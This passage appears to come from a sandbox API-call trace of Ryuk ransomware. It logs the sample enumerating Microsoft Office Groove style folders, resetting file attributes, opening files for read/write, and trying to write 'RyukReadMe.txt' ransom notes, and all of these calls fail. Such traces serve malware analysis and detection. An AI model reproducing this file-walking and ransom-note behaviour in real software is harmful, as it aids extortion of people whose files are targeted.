Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\OliveGreen.css", dwFileAttributes=0x80) returned 0 [0137.111] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\OliveGreen.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\olivegreen.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.112] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.112] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.112] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.112] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.112] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Premium.css", dwFileAttributes=0x80) returned 0 [0137.112] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Premium.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\premium.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.112] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.112] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.112] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.112] SetLastError (dwErrCode=0x0) [0137.112] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.113] GetLastError () returned 0x5 [0137.113] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.113] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.113] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Slate\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.113] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.113] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.113] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.113] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Slate\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Slate\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\slate\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.113] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.113] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.113] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.113] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.114] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Slate\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.114] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Slate\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\slate\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.114] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.114] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.114] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.114] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.114] SetLastError (dwErrCode=0x0) [0137.114] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Slate\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\slate\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.114] GetLastError () returned 0x5 [0137.114] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.114] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.114] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.114] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.115] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Slate.css", dwFileAttributes=0x80) returned 0 [0137.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Slate.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\slate.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.115] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.115] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.115] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.115] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.115] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SlateBlue.css", dwFileAttributes=0x80) returned 0 [0137.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SlateBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\slateblue.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.116] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.116] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.116] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.116] SetLastError (dwErrCode=0x0) [0137.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.116] GetLastError () returned 0x5 [0137.116] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.116] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.116] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.116] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.117] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.117] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.117] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue\\background.gif", dwFileAttributes=0x80) returned 0 [0137.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\softblue\\background.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.118] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.118] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.118] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.118] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.118] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue\\tab_off.gif", dwFileAttributes=0x80) returned 0 [0137.119] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue\\tab_off.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\softblue\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.119] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.119] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.119] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.119] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.119] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue\\tab_on.gif", dwFileAttributes=0x80) returned 0 [0137.119] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue\\tab_on.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\softblue\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.119] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.119] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.119] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.119] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.120] SetLastError (dwErrCode=0x0) [0137.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\softblue\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.120] GetLastError () returned 0x5 [0137.120] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.120] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.120] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.120] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.120] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue.css", dwFileAttributes=0x80) returned 0 [0137.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\softblue.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.120] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.120] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.120] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.120] SetLastError (dwErrCode=0x0) [0137.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.121] GetLastError () returned 0x5 [0137.121] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.121] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.121] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.121] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.121] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.121] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.121] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen\\BUTTON.GIF", dwFileAttributes=0x80) returned 0 [0137.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen\\BUTTON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\springgreen\\button.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.121] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.121] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.122] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.122] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.122] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\springgreen\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.122] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.122] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.122] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.122] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.122] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\springgreen\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.123] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.123] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.123] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.123] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.123] SetLastError (dwErrCode=0x0) [0137.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\springgreen\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.123] GetLastError () returned 0x5 [0137.123] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.123] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.123] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.123] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.123] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen.css", dwFileAttributes=0x80) returned 0 [0137.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\springgreen.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.124] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.124] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.124] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.124] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.124] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Sts.css", dwFileAttributes=0x80) returned 0 [0137.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Sts.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\sts.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.124] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.124] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.124] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.124] SetLastError (dwErrCode=0x0) [0137.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.124] GetLastError () returned 0x5 [0137.124] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.125] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.125] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.126] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.126] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.126] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.127] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2\\background.gif", dwFileAttributes=0x80) returned 0 [0137.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\sts2\\background.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.127] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.127] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.127] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.127] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.127] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2\\header.gif", dwFileAttributes=0x80) returned 0 [0137.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2\\header.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\sts2\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.127] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.127] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.128] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.128] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.128] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2\\tab_off.gif", dwFileAttributes=0x80) returned 0 [0137.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2\\tab_off.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\sts2\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.128] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.128] 